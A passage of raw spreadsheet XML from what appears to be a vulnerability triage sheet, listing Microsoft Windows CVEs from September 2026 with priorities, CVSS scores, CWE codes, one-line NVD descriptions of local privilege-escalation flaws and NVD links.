s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O901" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P901" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q901" s="5" t="inlineStr" /><c r="R901" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S901" s="5" t="inlineStr"><is><t>Use after free in Kernel Streaming WOW Thunk Service Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T901" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69275</t></is></c></row><row r="902"><c r="A902" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B902" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C902" s="5" t="inlineStr"><is><t>CVE-2026-69279</t></is></c><c r="D902" s="5" t="n"><v>7</v></c><c r="E902" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F902" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G902" s="5" t="inlineStr" /><c r="H902" s="5" t="n"><v>0.003</v></c><c r="I902" s="5" t="inlineStr" /><c r="J902" s="5" t="inlineStr" /><c r="K902" s="5" t="inlineStr" /><c r="L902" s="5" t="inlineStr" /><c r="M902" s="5" t="inlineStr" /><c r="N902" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O902" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P902" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q902" s="5" t="inlineStr" /><c r="R902" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S902" s="5" t="inlineStr"><is><t>Use after free in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T902" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69279</t></is></c></row><row r="903"><c r="A903" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B903" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C903" s="5" t="inlineStr"><is><t>CVE-2026-69280</t></is></c><c r="D903" s="5" t="n"><v>7</v></c><c r="E903" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F903" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G903" s="5" t="inlineStr" /><c r="H903" s="5" t="n"><v>0.002</v></c><c r="I903" s="5" t="inlineStr" /><c r="J903" s="5" t="inlineStr" /><c r="K903" s="5" t="inlineStr" /><c r="L903" s="5" t="inlineStr" /><c r="M903" s="5" t="inlineStr" /><c r="N903" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O903" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P903" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q903" s="5" t="inlineStr" /><c r="R903" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S903" s="5" t="inlineStr"><is><t>Use after free in Windows Push Notifications allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T903" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69280</t></is></c></row><row r="904"><c r="A904" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B904" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C904" s="5" t="inlineStr"><is><t>CVE-2026-69281</t></is></c><c r="D904" s="5" t="n"><v>7</v></c><c r="E904" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F904" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G904" s="5" t="inlineStr" /><c r="H904" s="5" t="n"><v>0.003</v></c><c r="I904" s="5" t="inlineStr" /><c r="J904" s="5" t="inlineStr" /><c r="K904" s="5" t="inlineStr" /><c r="L904" s="5" t="inlineStr" /><c r="M904" s="5" t="inlineStr" /><c r="N904" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O904" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P904" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q904" s="5" t="inlineStr" /><c r="R904" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S904" s="5" t="inlineStr"><is><t>Use after free in Windows License Manager allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T904" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69281</t></is></c></row><row r="905"><c r="A905" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B905" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C905" s="5" t="inlineStr"><is><t>CVE-2026-69287</t></is></c><c r="D905" s="5" t="n"><v>7</v></c><c r="E905" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F905" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G905" s="5" t="inlineStr" /><c r="H905" s="5" t="n"><v>0.002</v></c><c r="I905" s="5" t="inlineStr" /><c r="J905" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K90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05" s="5" t="inlineStr" /><c r="M905" s="5" t="inlineStr" /><c r="N905" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O905" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P905" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q905" s="5" t="inlineStr" /><c r="R905" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S905" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Desktop Services allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T905" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69287</t></is></c></row><row r="906"><c r="A906" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B906" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C906" s="5" t="inlineStr"><is><t>CVE-2026-69292</t></is></c><c r="D906" s="5" t="n"><v>7</v></c><c r="E906" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F906" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G906" s="5" t="inlineStr" /><c r="H906" s="5" t="n"><v>0.002</v></c><c r="I906" s="5" t="inlineStr" /><c r="J906" s="5" t="inlineStr" /><c r="K906" s="5" t="inlineStr" /><c r="L906" s="5" t="inlineStr" /><c r="M906" s="5" t="inlineStr" /><c r="N906" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O906" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P906" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q906" s="5" t="inlineStr" /><c r="R906" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S906" s="5" t="inlineStr"><is><t>Double free in Remote Desktop Gateway Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T906" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69292</t></is></c></row><row r="907"><c r="A907" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B907" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C907" s="5" t="inlineStr"><is><t>CVE-2026-69299</t></is></c><c r="D907" s="5" t="n"><v>7</v></c><c r="E907" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F907" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G907" s="5" t="inlineStr" /><c r="H907" s="5" t="n"><v>0.002</v></c><c r="I907" s="5" t="inlineStr" /><c r="J907" s="5" t="inlineStr" /><c r="K907" s="5" t="inlineStr" /><c r="L907" s="5" t="inlineStr" /><c r="M907" s="5" t="inlineStr" /><c r="N907" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O907" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P907" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q907" s="5" t="inlineStr" /><c r="R907" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S907" s="5" t="inlineStr"><is><t>Use after free in Microsoft COM for Windows allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T907" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69299</t></is></c></row><row r="908"><c r="A908" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B908" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C908" s="5" t="inlineStr"><is><t>CVE-2026-69300</t></is></c><c r="D908" s="5" t="n"><v>7</v></c><c r="E908" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F908" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G908" s="5" t="inlineStr" /><c r="H908" s="5" t="n"><v>0.002</v></c><c r="I908" s="5" t="inlineStr" /><c r="J908" s="5" t="inlineStr" /><c r="K908" s="5" t="inlineStr" /><c r="L908" s="5" t="inlineStr" /><c r="M908" s="5" t="inlineStr" /><c r="N908" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O908" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P908" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q908" s="5" t="inlineStr" /><c r="R908" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S908" s="5" t="inlineStr"><is><t>Use after free in Windows Push Notifications allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T908" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69300</t></is></c></row><row r="909"><c r="A909" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B909" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C909" s="5" t="inlineStr"><is><t>CVE-2026-69309</t></is></c><c r="D909" s="5" t="n"><v>7</v></c><c r="E909" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F909" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G909" s="5" t="inlineStr" /><c r="H909" s="5" t="n"><v>0.003</v></c><c r="I909" s="5" t="inlineStr" /><c r="J909" s="5" t="inlineStr" /><c r="K909" s="5" t="inlineStr" /><c r="L909" s="5" t="inlineStr" /><c r="M909" s="5" t="inlineStr" /><c r="N909" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O909" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P909" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q909" s="5" t="inlineStr" /><c r="R909" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S909" s="5" t="inlineStr"><is><t>Double free in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T909" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69309</t></is></c></row><row r="910"><c r="A910" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B910" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C910" s="5" t="inlineStr"><is><t>CVE-2026-69310</t></is></c><c r="D910" s="5" t="n"><v>7</v></c><c r="E910" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F910" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G910" s="5" t="inlineStr" /><c r="H910" s="5" t="n"><v>0.003</v></c><c r="I910" s="5" t="inlineStr" /><c r="J910" s="5" t="inlineStr" /><c r="K910" s="5" t="inlineStr" /><c r="L910" s="5" t="inlineStr" /><c r="M910" s="5" t="inlineStr" /><c r="N910" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O910" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P910" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q910" s="5" t="inlineStr" /><c r="R910" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S910" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T910" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69310</t></is></c></row><row r="911"><c r="A911" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B911" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C911" s="5" t="inlineStr"><is><t>CVE-2026-69311</t></is></c><c r="D911" s="5" t="n"><v>7</v></c><c r="E911" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F911" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G911" s="5" t="inlineStr" /><c r="H911" s="5" t="n"><v>0.003</v></c><c r="I911" s="5" t="inlineStr" /><c r="J911" s="5" t="inlineStr" /><c r="K911" s="5" t="inlineStr" /><c r="L911" s="5" t="inlineStr" /><c r="M911" s="5" t="inlineStr" /><c r="N911" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O911" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P911" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q911" s="5" t="inlineStr" /><c r="R911" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S911" s="5" t="inlineStr"><is><t>Use after free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T911" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69311</t></is></c></row><row r="912"><c r="A912" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B912" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C912" s="5" t="inlineStr"><is><t>CVE-2026-69319</t></is></c><c r="D912" s="5" t="n"><v>7</v></c><c r="E912" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F912" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G912" s="5" t="inlineStr" /><c r="H912" s="5" t="n"><v>0.002</v></c><c r="I912" s="5" t="inlineStr" /><c r="J912" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K91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12" s="5" t="inlineStr" /><c r="M912" s="5" t="inlineStr" /><c r="N912" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O912" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P912" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q912" s="5" t="inlineStr" /><c r="R912" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S912" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T912" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69319</t></is></c></row><row r="913"><c r="A913" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B913" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C913" s="5" t="inlineStr"><is><t>CVE-2026-69331</t></is></c><c r="D913" s="5" t="n"><v>7</v></c><c r="E913" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F913" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G913" s="5" t="inlineStr" /><c r="H913" s="5" t="n"><v>0.002</v></c><c r="I913" s="5" t="inlineStr" /><c r="J913" s="5" t="inlineStr" /><c r="K913" s="5" t="inlineStr" /><c r="L913" s="5" t="inlineStr" /><c r="M913" s="5" t="inlineStr" /><c r="N913" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O913" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P913" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q913" s="5" t="inlineStr" /><c r="R913" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S913" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T913" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69331</t></is></c></row><row r="914"><c r="A914" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B914" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C914" s="5" t="inlineStr"><is><t>CVE-2026-69333</t></is></c><c r="D914" s="5" t="n"><v>7</v></c><c r="E914" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F914" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G914" s="5" t="inlineStr" /><c r="H914" s="5" t="n"><v>0.003</v></c><c r="I914" s="5" t="inlineStr" /><c r="J914" s="5" t="inlineStr" /><c r="K914" s="5" t="inlineStr" /><c r="L914" s="5" t="inlineStr" /><c r="M914" s="5" t="inlineStr" /><c r="N914" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O914" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P914" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q914" s="5" t="inlineStr" /><c r="R914" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S914" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T914" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69333</t></is></c></row><row r="915"><c r="A915" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B915" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C915" s="5" t="inlineStr"><is><t>CVE-2026-69335</t></is></c><c r="D915" s="5" t="n"><v>7</v></c><c r="E915" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F915" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G915" s="5" t="inlineStr" /><c r="H915" s="5" t="n"><v>0.003</v></c><c r="I915" s="5" t="inlineStr" /><c r="J915" s="5" t="inlineStr" /><c r="K915" s="5" t="inlineStr" /><c r="L915" s="5" t="inlineStr" /><c r="M915" s="5" t="inlineStr" /><c r="N915" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O915" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P915" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q915" s="5" t="inlineStr" /><c r="R915" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S915" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T915" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69335</t></is></c></row><row r="916"><c r="A916" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B916" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C916" s="5" t="inlineStr"><is><t>CVE-2026-69341</t></is></c><c r="D916" s="5" t="n"><v>7</v></c><c r="E916" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F916" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G916" s="5" t="inlineStr" /><c r="H916" s="5" t="n"><v>0.003</v></c><c r="I916" s="5" t="inlineStr" /><c r="J916" s="5" t="inlineStr" /><c r="K916" s="5" t="inlineStr" /><c r="L916" s="5" t="inlineStr" /><c r="M916" s="5" t="inlineStr" /><c r="N916" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O916" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P916" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q916" s="5" t="inlineStr" /><c r="R916" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S916" s="5" t="inlineStr"><is><t>Use after free in Windows Image Acquisition allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T916" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69341</t></is></c></row><row r="917"><c r="A917" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B917" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C917" s="5" t="inlineStr"><is><t>CVE-2026-69362</t></is></c><c r="D917" s="5" t="n"><v>7</v></c><c r="E917" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F917" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G917" s="5" t="inlineStr" /><c r="H917" s="5" t="n"><v>0.003</v></c><c r="I917" s="5" t="inlineStr" /><c r="J917" s="5" t="inlineStr" /><c r="K917" s="5" t="inlineStr" /><c r="L917" s="5" t="inlineStr" /><c r="M917" s="5" t="inlineStr" /><c r="N917" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O917" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P917" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q917" s="5" t="inlineStr" /><c r="R917" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S917" s="5" t="inlineStr"><is><t>Use after free in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T917" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69362</t></is></c></row><row r="918"><c r="A918" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B918" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C918" s="5" t="inlineStr"><is><t>CVE-2026-69379</t></is></c><c r="D918" s="5" t="n"><v>7</v></c><c r="E918" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F918" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G918" s="5" t="inlineStr" /><c r="H918" s="5" t="n"><v>0.003</v></c><c r="I918" s="5" t="inlineStr" /><c r="J918" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K918" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L918" s="5" t="inlineStr" /><c r="M918" s="5" t="inlineStr" /><c r="N918" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O918" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P918" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q918" s="5" t="inlineStr" /><c r="R918" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="S918" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T918" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69379</t></is></c></row><row r="919"><c r="A919" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B919" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C919" s="5" t="inlineStr"><is><t>CVE-2026-69383</t></is></c><c r="D919" s="5" t="n"><v>7</v></c><c r="E919" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F919" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G919" s="5" t="inlineStr" /><c r="H919" s="5" t="n"><v>0.002</v></c><c r="I919" s="5" t="inlineStr" /><c r="J919" s="5" t="inlineStr" /><c r="K919" s="5" t="inlineStr" /><c r="L919" s="5" t="inlineStr" /><c r="M919" s="5" t="inlineStr" /><c r="N919" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O919" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P919" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q919" s="5" t="inlineStr" /><c r="R919" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="S919" s="5" t="inlineStr"><is><t>External control of file name or path in Windows Shell allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T919" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69383</t></is></c></row><row r="920"><c r="A920" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B920" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C920" s="5" t="inlineStr"><is><t>CVE-2026-69385</t></is></c><c r="D920" s="5" t="n"><v>7</v></c><c r="E920" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F920" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G920" s="5" t="inlineStr" /><c r="H920" s="5" t="n"><v>0.002</v></c><c r="I920" s="5" t="inlineStr" /><c r="J920" s="5" t="inlineStr" /><c r="K920" s="5" t="inlineStr" /><c r="L920" s="5" t="inlineStr" /><c r="M920" s="5" t="inlineStr" /><c r="N920" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O920" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P920" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q920" s="5" t="inlineStr" /><c r="R920" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S920" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows TCP/IP allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T920" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69385</t></is></c></row><row r="921"><c r="A921" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B921" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C921" s="5" t="inlineStr"><is><t>CVE-2026-69388</t></is></c><c r="D921" s="5" t="n"><v>7</v></c><c r="E921" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F921" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G921" s="5" t="inlineStr" /><c r="H921" s="5" t="n"><v>0.003</v></c><c r="I921" s="5" t="inlineStr" /><c r="J921" s="5" t="inlineStr" /><c r="K921" s="5" t="inlineStr" /><c r="L921" s="5" t="inlineStr" /><c r="M921" s="5" t="inlineStr" /><c r="N921" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O921" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P921" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q921" s="5" t="inlineStr" /><c r="R921" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S921" s="5" t="inlineStr"><is><t>Use after free in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T921" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69388</t></is></c></row><row r="922"><c r="A922" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B922" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C922" s="5" t="inlineStr"><is><t>CVE-2026-69394</t></is></c><c r="D922" s="5" t="n"><v>7</v></c><c r="E922" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F922" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G922" s="5" t="inlineStr" /><c r="H922" s="5" t="n"><v>0.003</v></c><c r="I922" s="5" t="inlineStr" /><c r="J922" s="5" t="inlineStr" /><c r="K922" s="5" t="inlineStr" /><c r="L922" s="5" t="inlineStr" /><c r="M922" s="5" t="inlineStr" /><c r="N922" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O922" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P922" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q922" s="5" t="inlineStr" /><c r="R922" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S922" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T922" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69394</t></is></c></row><row r="923"><c r="A923" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B923" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C923" s="5" t="inlineStr"><is><t>CVE-2026-69398</t></is></c><c r="D923" s="5" t="n"><v>7</v></c><c r="E923" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F923" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G923" s="5" t="inlineStr" /><c r="H923" s="5" t="n"><v>0.002</v></c><c r="I923" s="5" t="inlineStr" /><c r="J923" s="5" t="inlineStr" /><c r="K923" s="5" t="inlineStr" /><c r="L923" s="5" t="inlineStr" /><c r="M923" s="5" t="inlineStr" /><c r="N923" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O923" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P923" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q923" s="5" t="inlineStr" /><c r="R923" s="5" t="inlineStr"><is><t>CWE-362, CWE-415</t></is></c><c r="S923" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T923" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69398</t></is></c></row><row r="924"><c r="A924" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B924" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C924" s="5" t="inlineStr"><is><t>CVE-2026-69401</t></is></c><c r="D924" s="5" t="n"><v>7</v></c><c r="E924" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F924" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G924" s="5" t="inlineStr" /><c r="H924" s="5" t="n"><v>0.002</v></c><c r="I924" s="5" t="inlineStr" /><c r="J924" s="5" t="inlineStr" /><c r="K924" s="5" t="inlineStr" /><c r="L924" s="5" t="inlineStr" /><c r="M924" s="5" t="inlineStr" /><c r="N924" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O924" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P924" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c 